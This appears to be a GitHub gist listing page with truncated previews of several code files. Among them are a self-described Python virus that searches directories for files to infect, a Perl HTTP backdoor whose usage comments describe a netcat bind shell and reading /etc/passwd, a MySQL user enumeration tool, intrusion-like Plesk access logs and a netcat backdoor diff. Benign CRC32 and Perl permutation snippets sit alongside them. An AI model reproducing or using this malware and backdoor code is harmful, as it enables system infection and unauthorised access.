This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import os | |
import datetime | |
SIGNATURE = "CRANKLIN PYTHON VIRUS" | |
def search(path): | |
filestoinfect = [] | |
filelist = os.listdir(path) | |
for fname in filelist: | |
if os.path.isdir(path+"/"+fname): | |
filestoinfect.extend(search(path+"/"+fname)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <getopt.h> | |
#include <netinet/ip.h> | |
#include <stdlib.h> | |
#include <sys/socket.h> | |
#include <netinet/in.h> | |
#include <arpa/inet.h> | |
#include <unistd.h> | |
#include <errno.h> | |
#include <string.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!usr/bin/perl -w | |
# httpdbackdoor.pl Usage: | |
# 1. bind shell: | |
# nc target 8080 | |
# ->SHELLPASSWORD{ENTER}{ENTER} | |
# 2. download files | |
# http://target:8080/file?/etc/passwd | |
# or | |
# http://target:8080/file?../some/file |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# MySQL User Account Enumeration Utility | |
# When an attacker authenticates using an incorrect password | |
# with the old authentication mechanism from mysql 4.x and below to a mysql 5.x server | |
# the mysql server will respond with a different message than Access Denied, what makes | |
# User Account Enumeration possible. | |
# The Downside is that the attacker has to reconnect for each user enumeration attempt | |
#20000 user accounts in 7 minutes | |
#Mon Jan 16 09:00:18 UTC 2012 | |
#Mon Jan 16 09:07:26 UTC 2012 | |
#root@vs2067037:~# wc -l MEDIUM.LST |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/************************************************************** | |
* * | |
* Fichier : crc32.c * | |
* Fonctions pour calculer le hash CRC32 * | |
* * | |
**************************************************************/ | |
/* Table of CRCs of all 8-bit messages. */ | |
unsigned long crc32_table[256]; | |
/* Flag: has the table been computed? Initially false. */ | |
int crc32_table_computed = 0; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
41.237.40.174 {removed}:8443 - [05/Jul/2012:09:58:09 -0700] "POST /login_up.php3 HTTP/1.1" 200 966 "Referer: htts://{removed}:8443/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/15.0.1084.56 Safari/546.5" | |
41.237.40.174 {removed}:8443 - [05/Jul/2012:09:58:11 -0700] "GET / HTTP/1.1" 200 1474 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/15.0.1084.56 Safari/546.5" | |
41.237.40.174 {removed}:8443 - [05/Jul/2012:09:58:15 -0700] "POST /plesk/client@1/domain@/?context=domains HTTP/1.1" 200 59408 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/15.0.1084.56 Safari/546.5" | |
41.237.40.174 {removed}:8443 - [05/Jul/2012:09:58:19 -0700] "GET /plesk/client@1/domain@3/hosting/file-manager/edit/?cmd=chdir&file=/httpdocs/media/system/js/ HTTP/1.1" 200 71214 "https://{removed}:8443/plesk/client@1/domain@3/hosting/file-manager/edit/?cmd=chdir&file=/httpdocs/media/system/js/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl | |
use Algorithm::Permute; | |
my @array = (1..9); | |
Algorithm::Permute::permute { print "@array\n" } @array; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl | |
use List::Permutor; | |
my $permutor = List::Permutor->new( 0, 1, 2); | |
while ( my @permutation = $permutor->next() ) { | |
print "@permutation\n"; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl | |
use Algorithm::Permute; | |
my $p = new Algorithm::Permute(['a'..'d']); | |
while (@res = $p->next) { | |
print join(", ", @res), "\n"; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Les fichiers binaires /home/swilting/Téléchargements/nc/doexec.o et /home/swilting/nc-win-backdoor-nc-win-backdoor/doexec.o sont différents. | |
diff -crB /home/swilting/Téléchargements/nc/getopt.c /home/swilting/nc-win-backdoor-nc-win-backdoor/getopt.c | |
*** /home/swilting/Téléchargements/nc/getopt.c 1996-11-06 22:40:36.000000000 +0100 | |
--- /home/swilting/nc-win-backdoor-nc-win-backdoor/getopt.c 2012-10-26 15:30:01.812133992 +0200 | |
*************** | |
*** 45,51 **** | |
#include <stdio.h> | |
#ifdef WIN32 | |
! #include <string.h> |
NewerOlder